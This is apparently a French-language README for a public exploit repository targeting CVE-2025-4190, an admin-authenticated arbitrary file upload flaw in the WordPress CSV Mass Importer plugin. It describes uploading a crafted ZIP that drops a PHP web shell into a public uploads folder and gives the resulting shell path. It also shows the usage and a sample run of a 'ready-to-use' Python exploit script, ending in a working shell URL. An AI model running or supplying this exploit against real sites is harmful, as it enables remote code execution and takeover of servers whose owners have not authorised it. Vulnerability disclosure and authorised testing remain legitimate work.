
CSV Mass Importer <= 1.2 - Admin+ Téléversement de fichier arbitraire
Le plugin CSV Mass Importer (≤ 1.2) pour WordPress contient une vulnérabilité de téléchargement arbitraire de fichiers Admin+.
En raison d'une validation inadéquate des fichiers téléchargés, les utilisateurs à hauts privilèges (comme l'administrateur) peuvent télécharger des fichiers arbitraires sur le serveur, même lorsque cela devrait être restreint — par exemple dans les configurations multisite.
Cette vulnérabilité permet à un attaquant de télécharger des shells PHP ou des fichiers malveillants, conduisant à une exécution de code à distance (RCE) sur le serveur.
Découvert par Nxploited (Khaled Alenazi).
Le plugin ne vérifie pas correctement les fichiers téléchargés lors de l'utilisation de la fonctionnalité d'import CSV.
Un fichier ZIP contrefait contenant un shell PHP peut être téléchargé et extrait dans un répertoire accessible publiquement.
Exemple de chemin du shell :
<target-url>/wp-content/uploads/cmi-data/nxploited.php
Ce dépôt contient un script d'exploitation Python prêt à l'emploi : 4190.py
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL
--username, -un USERNAME
WordPress admin username
--password, -p PASSWORD
WordPress admin password
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)
Ce code est fourni uniquement à des fins éducatives.
L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce script.
À utiliser de manière responsable et uniquement sur les systèmes que vous êtes autorisé à tester.
Découvert et développé par Khaled Alenazi (Nxploited) 🌟